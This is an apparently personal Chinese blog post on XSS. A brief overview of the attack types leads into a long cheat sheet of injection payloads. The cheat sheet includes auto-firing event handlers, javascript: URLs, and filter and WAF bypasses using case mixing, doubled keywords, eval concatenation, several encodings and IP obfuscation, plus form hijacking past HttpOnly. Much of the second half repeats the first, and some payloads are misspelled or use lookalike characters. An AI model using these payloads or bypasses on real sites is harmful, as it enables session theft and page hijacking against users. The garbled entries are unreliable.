xss漏洞

主要是有趣

已于 2023-09-08 16:15:08 修改

阅读量95

点赞数

文章标签： xss 前端

于 2023-09-01 11:28:22 首次发布

本文链接：https://blog.csdn.net/m0_55628907/article/details/132619255

版权

简介：

跨站脚本攻击（XSS）是一种常见的Web应用程序安全漏洞，攻击者可以利用它来注入恶意脚本代码到受攻击的网页中。本文将介绍XSS漏洞的原理、常见类型、潜在风险以及预防措施。

xss漏洞原理：

XSS漏洞的本质是由于Web应用程序未能正确过滤或转义用户输入，导致攻击者可以将恶意脚本代码注入到网页中。这些恶意脚本代码在用户浏览器中执行，从而使攻击者能够窃取用户的敏感信息、劫持用户会话、修改网页内容等。

xss漏洞类型

存储型XSS：攻击者将恶意脚本代码存储在Web应用程序的数据库或文件中，当其他用户浏览相关页面时，恶意代码会被执行。存储型存入数据库中，可持续时间长
反射型XSS：攻击者通过诱使用户点击恶意链接或访问特定的URL，将恶意脚本代码注入到URL参数中，服务器将该代码反射回用户的浏览器并执行。

反射型也称为非持久型，这种类型的脚本是最常见的，也是使用最为广泛的一种，主要用于将恶意的脚本附加到URL地址的参数中。

<script>alert(document.cookie)</script>
DOM型XSS：攻击者通过修改页面的DOM结构，使恶意脚本代码在浏览器中执行。需要用户点击，数据不到后端，直接由前端js进行处理，依赖于js的dom树，不向后端发送数据，不过服务器。由js对用户输入内容进行读取显示造成的xss

常用payload

<scirpt>

<scirpt>alert("xss");</script>

<img>

<img src=1 οnerrοr=alert("xss");>

<input>

<input οnfοcus="alert('xss');">

竞争焦点，从而触发onblur事件

<input οnblur=alert("xss") autofocus><input autofocus>

通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发

<input οnfοcus="alert('xss');" autofocus>

<details>

<details οntοggle="alert('xss');">

使用open属性触发ontoggle事件，无需用户去触发

<details open οntοggle="alert('xss');">

<svg>

<svg οnlοad=alert("xss");>

<select>

<select οnfοcus=alert(1)></select>

通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发

<select οnfοcus=alert(1) autofocus>

<iframe>

<iframe οnlοad=alert("xss");></iframe>

<video>

<video><source οnerrοr="alert(1)">

<audio>

<audio src=x οnerrοr=alert("xss");>

<body>

<body/οnlοad=alert("xss");>

利用换行符以及autofocus，自动去触发onscroll事件，无需用户去触发

<body

οnscrοll=alert("xss");><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>

<textarea>

<textarea οnfοcus=alert("xss"); autofocus>

<keygen>

<keygen autofocus οnfοcus=alert(1)> //仅限火狐

<marquee>

<marquee onstart=alert("xss")></marquee> //Chrome不行，火狐和IE都可以

<isindex>

<isindex type=image src=1 οnerrοr=alert("xss")>//仅限于IE

弹框函数

alert()

prompt()

confirm()

javascript伪协议

伪协议说明：

javascript:这个特殊的协议类型声明了URL的主体是任意的javascript代码，它由javascript的解释器运行。

①将javascript代码添加到客户端的方法是把它放置在伪协议说明符javascript:后的URL中。

这个特殊的协议类型声明了URL的主体是任意的javascript代码，它由javascript的解释器运行。如果javascript:URL中的javascript代码含有多个语句，必须使用分号将这些语句分隔开。这样的URL如下所示：

javascript:var now = new Date(); "<h1>The time is:</h1>" + now;

javascript伪协议可以在HTML链接中触发代码的执行

<a>标签
<a href="javascript:alert(`xss`);">xss</a>

<iframe>标签
<iframe src=javascript:alert('xss');></iframe>

<img>标签
<img src=javascript:alert('xss')>//IE7以下

<form>标签
<form action="Javascript:alert(1)"><input type=submit>

过滤绕过

htmlspecialchars转义特殊字符

&：转换为&

"：转换为"

'：转换为成为 '

<：转换为<

>：转换为>

过滤空格

用/代替空格

<img/src="x"/οnerrοr=alert("xss");>

过滤关键字

大小写绕过

<ImG sRc=x onerRor=alert("xss");>

双写关键字

有些waf可能会只替换一次且是替换为空，这种情况下我们可以考虑双写关键字绕过

<imimgg srsrcc=x οnerrοr=alert("xss");>

字符拼接

利用eval

<img src="x" οnerrοr="a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)">

利用top

<script>top["al"+"ert"](`xss`);</script>

其它字符混淆

有的waf可能是用正则表达式去检测是否有xss攻击，如果我们能fuzz出正则的规则，则我们就可以使用其它字符去混淆我们注入的代码了

下面举几个简单的例子

可利用注释、标签的优先级等

1.<<script>alert("xss");//<</script>

2.<title><img src=</title>><img src=x οnerrοr="alert(`xss`);"> //因为title标签的优先级比img的高，所以会先闭合title，从而导致前面的img标签无效

3.<SCRIPT>var a="\\";alert("xss");//";</SCRIPT>

编码绕过

Unicode编码绕过

<img src="x" οnerrοr="alert("xss");">

<img src="x" οnerrοr="eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b')">

url编码绕过

<img src="x" οnerrοr="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))">

<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

Ascii码绕过

<img src="x" οnerrοr="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))">

hex绕过

<img src=x οnerrοr=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>

八进制

<img src=x οnerrοr=alert('\170\163\163')>

base64绕过

<img src="x" οnerrοr="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))">

<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">

过滤双引号，单引号

1.如果是html标签中，我们可以不用引号。如果是在js中，我们可以用反引号代替单双引号

<img src="x" οnerrοr=alert(`xss`);>

2.使用编码绕过，具体看上面列举的例子，不多赘述了

过滤括号

当括号被过滤的时候可以使用throw来绕过

<svg/οnlοad="window.οnerrοr=eval;throw'=alert\x281\x29';">

过滤url地址

使用url编码

<img src="x" οnerrοr=document.location=`http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/`>

使用IP

1.十进制IP

<img src="x" οnerrοr=document.location=`http://2130706433/`>

2.八进制IP

<img src="x" οnerrοr=document.location=`http://0177.0.0.01/`>

3.hex

<img src="x" οnerrοr=document.location=`http://0x7f.0x0.0x0.0x1/`>

4.html标签中用//可以代替http://

<img src="x" οnerrοr=document.location=`//www.baidu.com`>

HttpOnly绕过

如果在cookie中设置了HttpOnly属性，那么通过js脚本将无法读取到cookie信息，这样能有效的防止xss。

作用：仅仅是防止通过js脚本读取到cookie信息

虽然设置了httponly之后拿不到cookie，但是还是存在xss跨站语句，阻止的仅仅是获取cookie

可绕过的两种方式：

浏览器保存账号面：产生在后台的XSS，例如存储型XSS，xss平台直接接收。

浏览器未保存读取密码:需要xss产生于登录地址，利用表单劫持

常用标签

无过滤情况

<script>

<scirpt>alert("xss");</script>

<img>

图片加载错误时触发

<img src="x" οnerrοr=alert(1)>

<img src="1" οnerrοr=eval("alert('xss')")>

鼠标指针移动到元素时触发

<img src=1 οnmοuseοver="alert(1)">

鼠标指针移出时触发

<img src=1 οnmοuseοut="alert(1)">

<a>

<a href="https://www.qq.com">qq</a>

<a href=javascript:alert('xss')>test</a>

<a href="javascript:a" οnmοuseοver="alert(/xss/)">aa</a>

<a href="" οnclick=alert('xss')>a</a>

<a href="" οnclick=eval(alert('xss'))>aa</a>

<a href=kycg.asp?ttt=1000 οnmοuseοver=prompt('xss') y=2016>aa</a>

<input>

<input οnfοcus="alert('xss');">

竞争焦点，从而触发onblur事件

<input οnblur=alert("xss") autofocus><input autofocus>

通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发

<input οnfοcus="alert('xss');" autofocus>

<input name="name" value="">

<input value="" οnclick=alert('xss') type="text">

<input name="name" value="" οnmοuseοver=prompt('xss') bad="">

<input name="name" value=""><script>alert('xss')</script>

按下按键时触发

<input type="text" οnkeydοwn="alert(1)">

按下按键时触发

<input type="text" οnkeypress="alert(1)">

松开按键式时触发

<input type="text" οnkeyup="alert(1)">

<from>

<form action=javascript:alert('xss') method="get">

<form action=javascript:alert('xss')>

<form method=post action=aa.asp? οnmοuseοver=prompt('xss')>

<form method=post action=aa.asp? οnmοuseοver=alert('xss')>

<form action=1 οnmοuseοver=alert('xss)>

<form method=post action="data:text/html;base64,<script>alert('xss')</script>">

<form method=post action="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">

(````只有两个``)

<svg>

<svg οnlοad=alert(1)>

<body>

<body οnlοad="alert(1)">

利用换行符以及autofocus，自动去触发onscroll事件，无需用户去触发

<body οnscrοll=alert("xss");><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>

<button>

元素上点击鼠标时触发

<button οnclick="alert(1)">text</button>

<p>

元素上按下鼠标时触发

<p οnmοusedοwn="alert(1)">text</p>

元素上释放鼠标时触发

<p οnmοuseup="alert(1)">text</p>

<details>

<details οntοggle="alert('xss');">

使用open属性触发ontoggle事件，无需用户去触发

<details open οntοggle="alert('xss');">

<select>

<select οnfοcus=alert(1)></select>

通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发

<select οnfοcus=alert(1) autofocus>

<video>

<video><source οnerrοr="alert(1)">

<audio>

<audio src=x οnerrοr=alert("xss");>

<textarea>

<textarea οnfοcus=alert("xss"); autofocus>

<keygen>

<keygen autofocus οnfοcus=alert(1)> //仅限火狐

<marquee>

<marquee onstart=alert("xss")></marquee> //Chrome不行，火狐和IE都可以

<isindex>

<isindex type=image src=1 οnerrοr=alert("xss")>//仅限于IE

利用link远程包含js文件

在无CSP的情况下才可以

<link rel=import href="http://127.0.0.1/1.js">

javascript伪协议

<a>标签

<a href="javascript:alert('xss');">xss</a>

<img>标签

<img src=javascript:alert('xss')>//IE7以下

<form>标签

<form action="Javascript:alert(1)"><input type=submit>

expression属性

<img style="xss:expression(alert('xss''))"> // IE7以下

<div style="color:rgb(''�x:expression(alert(1))"></div> //IE7以下

<style>#test{x:expression(alert(/XSS/))}</style> // IE7以下

background属性

<table background=javascript:alert(1)></table> //在Opera 10.5和IE6上有效

存在过滤情况

过滤空格

用 / 代替空格

<img/src="x"/οnerrοr=alert("xss");>

过滤关键字

大小写绕过

<ImG sRc=x onerRor=alert("xss");>

双写关键字(有些waf可能会只替换一次且是替换为空，这种情况下我们可以考虑双写关键字绕过)

<imimgg srsrcc=x οnerrοr=alert("xss");>

字符拼接(利用eval)

<img src="x" οnerrοr="a=aler;b=t;c='(xss);';eval(a+b+c)">

字符拼接(利用top)

<script>top["al"+"ert"](``xss``);</script>(只有两个``这里是为了凸显出有`符号)

其它字符混淆

有的waf可能是用正则表达式去检测是否有xss攻击，如果我们能fuzz出正则的规则，则我们就可以使用其它字符去混淆我们注入的代码了

下面举几个简单的例子

可利用注释、标签的优先级等

<<script>alert("xss");//<</script>

<script>alert("hello world!")</script>

<title><img src=</title>><img src=x οnerrοr="alert(``xss``);"> 因为title标签的优先级比img的高，所以会先闭合title，从而导致前面的img标签无效

<SCRIPT>var a="\\";alert("xss");//";</SCRIPT>

编码绕过

Unicode编码绕过

<img src="x" οnerrοr="alert("xss");">

<img src="x" οnerrοr="eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b')">

url编码绕过

<img src="x" οnerrοr="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))">

<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

Ascii码绕过

<img src="x" οnerrοr="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))">

Hex绕过

<img src=x οnerrοr=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>

八进制绕过

<img src=x οnerrοr=alert('\170\163\163')>

base64绕过

<img src="x" οnerrοr="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))">

<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">

过滤双引号，单引号

如果是html标签中，我们可以不用引号；如果是在js中，我们可以用反引号代替单双引号

<img src="x" οnerrοr=alert(``xss``);>

使用编码绕过，具体看上面列举的例子

过滤括号

当括号被过滤的时候可以使用throw来绕过

<svg/οnlοad="window.οnerrοr=eval;throw'=alert\x281\x29';">

过滤url地址

使用url编码

<img src="x" οnerrοr=document.location=``http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/``>

使用IP

<img src="x" οnerrοr=document.location=``http://2130706433/``>十进制

<img src="x" οnerrοr=document.location=``http://0177.0.0.01/``>八进制

<img src="x" οnerrοr=document.location=``http://0x7f.0x0.0x0.0x1/``>十六进制

<img src="x" οnerrοr=document.location=``//www.baidu.com``>html标签中用//可以代替http://

使用\ (注意：在windows下\本身就有特殊用途，是一个path 的写法，所以\在Windows下是file协议，在linux下才会是当前域的协议)

使用中文逗号代替英文逗号

<img src="x" οnerrοr="document.location=``http://www。baidu。com``">//会自动跳转到百度